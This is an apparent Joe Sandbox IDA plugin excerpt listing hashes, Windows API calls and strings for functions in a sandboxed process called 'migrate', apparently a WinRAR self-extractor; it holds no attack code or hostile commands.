                                                                                                                                                                                                    • Opcode ID: 056f4fbf85daee2fc1e3b33fc3b42a3ec5076bd6a2e0b35540f442f72e22f58f
                                                                                                                                                                                                    • Instruction ID: c991f510e279db3a9c369bd2d8f6d7d5593124090bc628d308cc170189b970df
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 056f4fbf85daee2fc1e3b33fc3b42a3ec5076bd6a2e0b35540f442f72e22f58f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB715E75A01619AFDB18DFA4CC95DAEBBB9FF49310B14016DF512A72A0CB306D82CB50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00119387
                                                                                                                                                                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001193AA
                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 001193C9
                                                                                                                                                                                                      • Part of subcall function 0011C29A: _wcslen.LIBCMT ref: 0011C2A2
                                                                                                                                                                                                      • Part of subcall function 00121FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0011C116,00000000,.exe,?,?,00000800,?,?,?,00128E3C), ref: 00121FD1
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00119465
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001194D4
                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00119514
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                                                                                                    • String ID: rtmp%d
                                                                                                                                                                                                    • API String ID: 3726343395-3303766350
                                                                                                                                                                                                    • Opcode ID: 91162eaebc49dbc21b2468bb33250d5705a47a548aab13c88f846fa2a3fdbeb4
                                                                                                                                                                                                    • Instruction ID: a86c7b6c4892c6b241d7a03b2247ff52ef42f88cf63d86dacbe327ef0579aa51
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91162eaebc49dbc21b2468bb33250d5705a47a548aab13c88f846fa2a3fdbeb4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3141A77190026466DF65EBA0CD65EEE737DAF55340F0048B6B629F3052EB388BC9CB60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 0012122E
                                                                                                                                                                                                      • Part of subcall function 0011B146: GetVersionExW.KERNEL32(?), ref: 0011B16B
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00121251
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00121263
                                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00121274
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00121284
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00121294
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 001212CF
                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 00121379
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1247370737-0
                                                                                                                                                                                                    • Opcode ID: 6b5f055ae924a06867789863dfab067659675af476e7eb94d9e89e86ba409742
                                                                                                                                                                                                    • Instruction ID: 4bef890410022baa432363ab9ed672ccad48286a29b28d30ac4c3ee214671157
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b5f055ae924a06867789863dfab067659675af476e7eb94d9e89e86ba409742
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F64145B6508305AFC710DF65D88096BFBF9FB88714F00892EF596C2610E734E659CB52
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 00112536
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                      • Part of subcall function 001205DA: _wcslen.LIBCMT ref: 001205E0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: __vswprintf_c_l_swprintf_wcslen
• String ID: ;%u$x%u$xc%u
• API String ID: 3053425827-2277559157
• Opcode ID: f2e9cd42f33409528617ab0c90d20b807f36d7a18e24a2c365e06a4a96b80828
• Instruction ID: 639c9de84f841edcb52bac790079445451dbbf97e6d817ed6ddd1122cf3b8ed4
• Opcode Fuzzy Hash: f2e9cd42f33409528617ab0c90d20b807f36d7a18e24a2c365e06a4a96b80828
• Instruction Fuzzy Hash: 9EF104706082819BCB2DDB248495BFE77D66BA4300F08057DFD8A9B283DB748DD5C7A2
APIs
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _wcslen
• String ID: </p>$</style>$<br>$<style>$>
• API String ID: 176396367-3568243669
• Opcode ID: c46ce704a0085d4118bff23d2a6bb7c0ede7b81162e0c4c85378e6db7aac9361
• Instruction ID: 0808875cfee8aff5a1cfe0955a1d5c0f8f4781a8d2606130a752e36ac7471701
• Opcode Fuzzy Hash: c46ce704a0085d4118bff23d2a6bb7c0ede7b81162e0c4c85378e6db7aac9361
• Instruction Fuzzy Hash: C351596670037795DB349A6DB8217B673E0EFA1750F6A042AF9C18B1C0FB658CA19361
APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0013FE02,00000000,00000000,00000000,00000000,00000000,0013529F), ref: 0013F6CF
• __fassign.LIBCMT ref: 0013F74A
• __fassign.LIBCMT ref: 0013F765
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0013F78B
• WriteFile.KERNEL32(?,00000000,00000000,0013FE02,00000000,?,?,?,?,?,?,?,?,?,0013FE02,00000000), ref: 0013F7AA
• WriteFile.KERNEL32(?,00000000,00000001,0013FE02,00000000,?,?,?,?,?,?,?,?,?,0013FE02,00000000), ref: 0013F7E3
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 460043ffc9514ef90c0d35f4dcdfe73c4e82f9f897547ef61bfac44e5c900043
• Instruction ID: 932461b39f7af0a449f6427b07a22a0bcb58081466c58d662e853d9d47d77c25
• Opcode Fuzzy Hash: 460043ffc9514ef90c0d35f4dcdfe73c4e82f9f897547ef61bfac44e5c900043
• Instruction Fuzzy Hash: C95173B5E00249AFDB14CFA8DC85AEEBBF4EF09310F14416EE555E7251D770AA42CBA0
APIs
• _ValidateLocalCookies.LIBCMT ref: 00132937
• ___except_validate_context_record.LIBVCRUNTIME ref: 0013293F
• _ValidateLocalCookies.LIBCMT ref: 001329C8
• __IsNonwritableInCurrentImage.LIBCMT ref: 001329F3
• _ValidateLocalCookies.LIBCMT ref: 00132A48
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 87b69c89deb4c90af65ff7d68b9a6048640891d75fe14b9ef2fcf95d3fbb0c2b
• Instruction ID: 86e432b7487851d2607220ef4bc9619b06ea02822531bc4676b86f2be08204e2
• Opcode Fuzzy Hash: 87b69c89deb4c90af65ff7d68b9a6048640891d75fe14b9ef2fcf95d3fbb0c2b
• Instruction Fuzzy Hash: 2C41B534A00219AFCF10EF68C885B9EBBF5FF55328F148095E815AB3A2D771DA45CB91
APIs
• ShowWindow.USER32(?,00000000), ref: 00129EEE
• GetWindowRect.USER32(?,00000000), ref: 00129F44
• ShowWindow.USER32(?,00000005,00000000), ref: 00129FDB
• SetWindowTextW.USER32(?,00000000), ref: 00129FE3
• ShowWindow.USER32(00000000,00000005), ref: 00129FF9
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: RarHtmlClassName
• API String ID: 3937224194-1658105358
• Opcode ID: cd1a5ad2ab5e8e9ae6ea7e3bc5775db8ab05b04df173f2f0ededf92ae32978c6
• Instruction ID: ecfacdcb955d0efcfde070015e6b5f20ee34e4045fe47ff03c7def9c169478d0
• Opcode Fuzzy Hash: cd1a5ad2ab5e8e9ae6ea7e3bc5775db8ab05b04df173f2f0ededf92ae32978c6
• Instruction Fuzzy Hash: 5B41E271004320EFDB215F68EC48B6BBFB8FF48701F404559F8599A066CB34D9A4DBAA
APIs
Strings
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: _wcslen
• String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 176396367-3743748572
• Opcode ID: e60506f56d2fe4bffe9b1a11a7018054f9169f9787d9716da7b07455c6be9b42
• Instruction ID: 5a7eed8f320f155602376a4b155648cdf80eaa1bdc931382d82d8141aca79591
• Opcode Fuzzy Hash: e60506f56d2fe4bffe9b1a11a7018054f9169f9787d9716da7b07455c6be9b42
• Instruction Fuzzy Hash: 5831823264435566DA34AB5CBC43B7B73A4EB90330F60842FF496472C0FB90ADA183A5
APIs
  • Part of subcall function 0013C868: _free.LIBCMT ref: 0013C891
• _free.LIBCMT ref: 0013C8F2
  • Part of subcall function 00138DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?), ref: 00138DE2
  • Part of subcall function 00138DCC: GetLastError.KERNEL32(?,?,0013C896,?,00000000,?,00000000,?,0013C8BD,?,00000007,?,?,0013CCBA,?,?), ref: 00138DF4
• _free.LIBCMT ref: 0013C8FD
• _free.LIBCMT ref: 0013C908
• _free.LIBCMT ref: 0013C95C
• _free.LIBCMT ref: 0013C967
• _free.LIBCMT ref: 0013C972
• _free.LIBCMT ref: 0013C97D
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                    • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                                                    • Instruction ID: 800e4b54f3b86b9f36c07b263607cf44f1b217e8ee085384dc1ed4e58be219c7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6112172580B04AAE920B7B1CC07FCB7BAC9F24B10F404C55B39D76092DB75B6158790
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0012E669,0012E5CC,0012E86D), ref: 0012E605
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0012E61B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0012E630
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                                                    • API String ID: 667068680-1718035505
                                                                                                                                                                                                    • Opcode ID: dc59b7c4084e7e1e012254315de1c5ec761e55d0c07cfdee45bb6a9ecb60db70
                                                                                                                                                                                                    • Instruction ID: 392037a5150aefd00d041e84e74340de08a49e604e8fcbc4074ecda145d64174
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc59b7c4084e7e1e012254315de1c5ec761e55d0c07cfdee45bb6a9ecb60db70
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21F02B317802326F4F224FB97D8557623E9AF26741B110539E905DB620EB10CCF45FA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 001214C2
                                                                                                                                                                                                      • Part of subcall function 0011B146: GetVersionExW.KERNEL32(?), ref: 0011B16B
                                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001214E6
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00121500
                                                                                                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00121513
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00121523
                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00121533
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2092733347-0
                                                                                                                                                                                                    • Opcode ID: 53298238644c20a1afaf17d6a7dc5bd3a0de0f512868c16103da77ef89f3f22e
                                                                                                                                                                                                    • Instruction ID: 224e355914760b2b422d7162825fe7fb307a57d99216e495db8b64a9a6c9046b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53298238644c20a1afaf17d6a7dc5bd3a0de0f512868c16103da77ef89f3f22e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B31E879208355AFC704DFA8D88499BB7F8BF98714F004A1EF999C3610E730D559CBA6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00132AF1,001302FC,0012FA34), ref: 00132B08
                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00132B16
                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00132B2F
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00132AF1,001302FC,0012FA34), ref: 00132B81
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                    • Opcode ID: 48eb1227fa1f34925839a0ed84c703738d955adba05b4ce269b6e1ba0b6e3bc2
                                                                                                                                                                                                    • Instruction ID: a53836ca7c039e7e514eb52d6ce0a1ec15a6a783f1d526baa7cf34c69c9923e0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48eb1227fa1f34925839a0ed84c703738d955adba05b4ce269b6e1ba0b6e3bc2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE01D4371083116EEA243BB47C85926AB99EF227B6F60073AF520554F4EF624C419288
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00151098,00134674,00151098,?,?,001340EF,?,?,00151098), ref: 001397E9
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013981C
                                                                                                                                                                                                    • _free.LIBCMT ref: 00139844
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00151098), ref: 00139851
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00151098), ref: 0013985D
                                                                                                                                                                                                    • _abort.LIBCMT ref: 00139863
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                    • Opcode ID: a885b556d03dd2adea74e8b318a9789e512cb15d1628b89481a3572f9e4eb281
                                                                                                                                                                                                    • Instruction ID: 95225f2beed8547f7334a208756a1a5c38a256251cbd71cfffb7314d0e7c552c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a885b556d03dd2adea74e8b318a9789e512cb15d1628b89481a3572f9e4eb281
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F0C839144605A6C71233747C4AA1B2A759FE3B71F350174F628925A2FFA0C8464565
APIs
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 0012DC47
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0012DC61
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012DC72
• TranslateMessage.USER32(?), ref: 0012DC7C
• DispatchMessageW.USER32(?), ref: 0012DC86
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 0012DC91
Memory Dump Source
• Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
• Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_110000_migrate.jbxd
Similarity
• API ID: Message$ObjectSingleWait$DispatchPeekTranslate
• String ID:
• API String ID: 2148572870-0
• Opcode ID: d1735c635713453c4a52126b04bd0ea7d6db2af41f7dff61fd3662c182c51814
• Instruction ID: b36778cf119abed2f29430876edcbcca0137a757ac452682844251fbb486587b
• Opcode Fuzzy Hash: d1735c635713453c4a52126b04bd0ea7d6db2af41f7dff61fd3662c182c51814
